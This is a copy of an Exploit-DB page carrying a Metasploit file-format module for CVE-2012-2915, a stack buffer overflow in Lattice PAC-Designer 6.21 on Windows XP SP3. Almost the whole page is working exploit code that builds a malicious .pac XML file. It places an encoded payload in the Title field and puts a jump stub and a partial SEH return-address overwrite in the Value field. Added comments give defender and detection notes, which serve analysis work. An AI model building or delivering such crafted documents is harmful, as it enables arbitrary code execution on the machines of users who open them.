Lattice Semiconductor PAC-Designer 6.21 – Symbol Value Buffer Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2012-06-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19175/
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
    # Metasploit file-format module for CVE-2012-2915. It generates a crafted
    # PAC-Designer document (.pac, XML) whose <Value> element under
    # <SymbolicSchematicData> carries an over-long string; per the module
    # description this corrupts the stack of PAC-Designer 6.21 and leads to code
    # execution in the context of the user running the application.
    #
    # Defender notes:
    # - The visible code only builds a document and hands it to file_create, so
    #   the delivery vector is a file the victim's PAC-Designer has to parse.
    #   Treat .pac files from untrusted senders like any other untrusted
    #   document format.
    # - Only one target is defined: 6.21 on Windows XP SP3.
    # - NOTE(review): no fixed product version is named on this page -- check
    #   the vendor and the CVE record before assuming an upgrade path exists.
    class Metasploit3 < Msf::Exploit::Remote
    	# Framework-supplied ranking constant for this module.
    	Rank = NormalRanking
    
    	# Mixin that provides file_create, called at the end of #exploit; its
    	# implementation lives in the framework, not in this file.
    	include Msf::Exploit::FILEFORMAT
    
    	# Registers the module metadata (name, description, references, payload
    	# constraints, the single target) and the FILENAME option.
    	#
    	# @param info [Hash] metadata overrides, merged through update_info
    	def initialize(info={})
    		super(update_info(info,
    			'Name' => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
    			'Description'=> %q{
    					This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
    				6.21.As a .pac file, when supplying a long string of data to the 'value' field
    				under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
    				on the stack, which results in arbitrary code execution under the context of the
    				user.
    			},
    			'License'=> MSF_LICENSE,
    			'Author' =>
    				[
    					'Unknown',#Discovery
    					'juan vazquez', #Metasploit
    					'sinn3r'#Metasploit
    				],
    			# Public identifiers for the flaw; useful as pivots when checking
    			# scanner coverage or advisory status.
    			'References' =>
    				[
    					['CVE', '2012-2915'],
    					['OSVDB', '82001'],
    					['EDB', '19006'],
    					['BID', '53566'],
    					['URL', 'http://secunia.com/advisories/48741']
    				],
    			'Payload'=>
    				{
    					# Bytes the encoder must avoid: NUL, '<' (0x3c) and '>' (0x3e).
    					# NOTE(review): presumably because the payload is embedded
    					# in XML element text -- confirm against the parser.
    					'BadChars' => "\x00\x3c\x3e",
    					# Framework payload option, value kept from the original module.
    					# NOTE(review): presumably shifts the stack pointer before
    					# the payload runs -- confirm in the framework docs.
    					'StackAdjustment' => -3500,
    				},
    			'DefaultOptions'=>
    				{
    					'ExitFunction' => "seh"
    				},
    			'Platform' => 'win',
    			'Targets'=>
    				[
    					[
    						'PAC-Designer 6.21 on Windows XP SP3',
    						{
    							# Defender note: this is a fixed address inside the
    							# application's own executable, which the lines below
    							# record as built without ASLR, rebasing or SafeSEH.
    							# Mitigations that randomise the image base or validate
    							# exception handlers would break that assumption.
    							# NOTE(review): verify which of those are available
    							# on the Windows version actually deployed.
    							# P/P/R in PACD621.exe
    							# ASLR: False, Rebase: False, SafeSEH: False, OS: False
    							'Ret' => 0x00805020
    						}
    					],
    				],
    			'Privileged' => false,
    			'DisclosureDate' => "May 16 2012",
    			'DefaultTarget'=> 0))
    
    		# FILENAME is required and defaults to 'msf.pac'.
    		register_options(
    			[
    				OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
    			], self.class)
    	end
    
    	# Builds the crafted .pac document and passes it to file_create.
    	#
    	# Layout, as assembled below: the encoded payload goes into <Title>; the
    	# <Value> element receives an 11-byte fixed stub padded with random letters
    	# to 96 bytes, then a 2-byte short jump plus 2 random letters, then the
    	# low three bytes of the target address (103 bytes in total).
    	#
    	# Detection notes:
    	# - The padding, the two filler letters and <Author> are random on every
    	#   run and the payload is encoder output, so whole-file hashes will not
    	#   generalise across samples; match on structure instead.
    	# - Stable features visible here are the fixed stub at the start of
    	#   <Value>, the three trailing address bytes, and a <Title> that holds
    	#   encoder output rather than a document title.
    	# - NOTE(review): the skeleton values (DeviceType, SymKey, NameText) may
    	#   equally appear in legitimate files; baseline against known-good .pac
    	#   files before alerting on them or on field length alone.
    	def exploit
    		# The payload is placed in the <title> field
    		p = payload.encoded
    
    		# The trigger is placed in the <value> field, which will jmp to our
    		# payload in the <title> field.
    		buf= "\x5f"#POP EDI
    		buf << "\x5f"#POP EDI
    		buf << "\x5c"#POP ESP
    		buf << "\x61"*6#POPAD x 6
    		buf << "\x51"#PUSH ECX
    		buf << "\xc3"#RET
    		# Pad with random letters so the stub plus padding is exactly 96 bytes.
    		buf << rand_text_alpha(96-buf.length, payload_badchars)
    		buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"#Jmp back to the beginning of the buffer
    		# pack('V') is 32-bit little-endian; only the first three bytes are
    		# appended, so the 0x00 top byte of the address (a listed bad char)
    		# is never written into the file.
    		buf << [target.ret].pack('V')[0,3] # Partial overwrite
    
    		# Document skeleton; p and buf are interpolated verbatim, with no XML
    		# escaping applied in this method.
    		xml = %Q|<?xml version="1.0"?>
    <PacDesignData>
    	<DocFmtVersion>1</DocFmtVersion>
    	<DeviceType>ispPAC-CLK5410D</DeviceType>
    	<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
    	<SummaryInformation>
    		<Title>#{p}</Title>
    		<Author>#{Rex::Text.rand_text_alpha(6)}</Author>
    	</SummaryInformation>
    
    	<SymbolicSchematicData>
    		<Symbol>
    			<SymKey>153</SymKey>
    			<NameText>Profile 0 Ref Frequency</NameText>
    			<Value>#{buf}</Value>
    		</Symbol>
    	</SymbolicSchematicData>
    </PacDesignData>|
    
    		# file_create comes from the FILEFORMAT mixin.
    		# NOTE(review): presumably writes the document under the FILENAME
    		# option -- confirm in the framework.
    		file_create(xml)
    	end
    end